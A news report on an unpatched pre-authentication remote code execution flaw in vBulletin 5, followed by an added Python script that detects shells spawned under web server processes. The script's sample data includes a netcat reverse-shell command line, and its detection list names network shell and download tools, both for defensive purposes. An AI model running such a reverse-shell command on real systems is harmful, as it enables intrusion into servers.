AN ANONYMOUS RESEARCHER has published details about an unpatched, zero-day vulnerability affecting web forum application vBulletin.

The flaw affects version 5 of the vBulletin forum software and could be exploited by hackers to take over vulnerable web forums.

The researcher revealed details of this "pre-authentication remote code execution" weakness in a post to the Full Disclosure mailing list, sent from an email address that gave no clue to their identity. Proof-of-concept code that could be used to exploit the zero-day flaw in the wild was published alongside it.

The post explained how attackers could use a single HTTP POST request to execute a shell command, without authentication, on a targeted vBulletin server. That would enable an attacker to hijack the web server running the forum software, use it to launch attacks on other machines, and modify or steal sensitive information.

The vulnerability appears to affect vBulletin versions 5.0.0 up to the latest 5.5.4 and no patch is currently available.

vBulletin is one of the most popular web forum software packages, powering over 100,000 websites. Version 5 of the software was introduced in 2012 and, despite being a commercial product, vBulletin has a larger user base than rival forum packages such as XenForo and the open-source phpBB, MyBB and Simple Machines Forum.

It is not known whether the anonymous researcher had notified the vBulletin team about the vulnerability, nor whether a failure by the vendor to address the issue prompted the researcher to disclose the flaw publicly.

Because details of the unpatched vulnerability are now in the public domain, security experts are concerned that hackers could soon start attacking web forums across the internet in an effort to steal sensitive user information in bulk.

They have also advised websites running vBulletin version 5 to watch their servers closely for any sign that the vulnerability is being exploited against them.
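The exploit described above ends with the web server's worker process executing a shell command, and the advice to "watch their servers closely" is easiest to act on at exactly that point: a PHP application server has no business spawning shells. The script below, an added example that is not from the original article, from the researcher's proof of concept or from vBulletin, walks the Linux process tree and flags any shell or download tool that descends from a web server process. The process names in WEB_SERVER_NAMES and SHELL_NAMES are assumptions for a typical LAMP/php-fpm host, and the sample process table is constructed for illustration; on a live Linux box the script reads /proc instead.

```python
"""Flag shells spawned by the web server process tree.

Added example (not from the article or from vBulletin). A pre-auth RCE
such as the one described above typically shows up as a shell, scripting
interpreter or download tool whose ancestor is the PHP/Apache worker.
"""
import os
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Assumption: typical process names on a LAMP / php-fpm host. Tune for your stack.
WEB_SERVER_NAMES = {"apache2", "httpd", "php-fpm", "php-fpm7.4", "php-fpm8.1", "nginx"}
# Assumption: programs an attacker's command injection commonly lands in.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "perl", "python", "python3",
               "nc", "ncat", "curl", "wget"}


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str      # executable name as reported by the kernel
    cmdline: str   # full command line, for the report
    user: str      # owner (uid or name)


def read_proc() -> List[Proc]:
    """Build the live process table from /proc (Linux only)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            # comm is inside parentheses and may contain spaces; fields after ')' are state, ppid, ...
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            uid = os.stat(f"/proc/{pid}").st_uid
        except (OSError, ValueError, IndexError):
            continue  # process exited while we were reading it
        procs.append(Proc(pid, ppid, comm, cmdline, str(uid)))
    return procs


def ancestors(proc: Proc, by_pid: Dict[int, Proc]) -> Iterable[Proc]:
    """Yield the parent chain of proc, stopping at init or at a cycle."""
    seen = set()
    p = proc
    while p.ppid > 1 and p.ppid in by_pid and p.ppid not in seen:
        seen.add(p.ppid)
        p = by_pid[p.ppid]
        yield p


def find_suspicious(procs: List[Proc],
                    web_names=WEB_SERVER_NAMES,
                    shell_names=SHELL_NAMES) -> List[Tuple[Proc, Proc]]:
    """Return (child, web_server_ancestor) pairs for every shell/tool under a web worker."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        if p.comm not in shell_names:
            continue
        for anc in ancestors(p, by_pid):
            if anc.comm in web_names:
                hits.append((p, anc))
                break
    return hits


def report(hits: List[Tuple[Proc, Proc]]) -> List[str]:
    """One human-readable line per finding."""
    return [f"ALERT pid={c.pid} user={c.user} comm={c.comm} cmd={c.cmdline!r} "
            f"spawned under {a.comm} (pid {a.pid})" for c, a in hits]


# Constructed sample table: a php-fpm worker that has run `sh -c` and a
# reverse shell via nc, plus an unrelated root bash session that must not fire.
SAMPLE_PROCS = [
    Proc(1,   0,   "systemd", "/sbin/init", "0"),
    Proc(800, 1,   "php-fpm", "php-fpm: master process", "0"),
    Proc(801, 800, "php-fpm", "php-fpm: pool www", "33"),
    Proc(802, 801, "sh",      "sh -c id", "33"),
    Proc(804, 802, "nc",      "nc 192.0.2.10 4444 -e /bin/sh", "33"),
    Proc(900, 1,   "bash",    "-bash", "0"),
]

if __name__ == "__main__":
    table = read_proc() if os.path.isdir("/proc") else SAMPLE_PROCS
    for line in report(find_suspicious(table)):
        print(line)
```

Run it from cron or a systemd timer and ship the ALERT lines to your log pipeline; a PHP application that legitimately calls exec() for image conversion or similar will need its tool names removed from SHELL_NAMES rather than ignored wholesale. The check is deliberately independent of the exact request the exploit uses, so it keeps working after the vendor's patch changes the vulnerable code path, and it also catches other command-injection bugs in the same process tree.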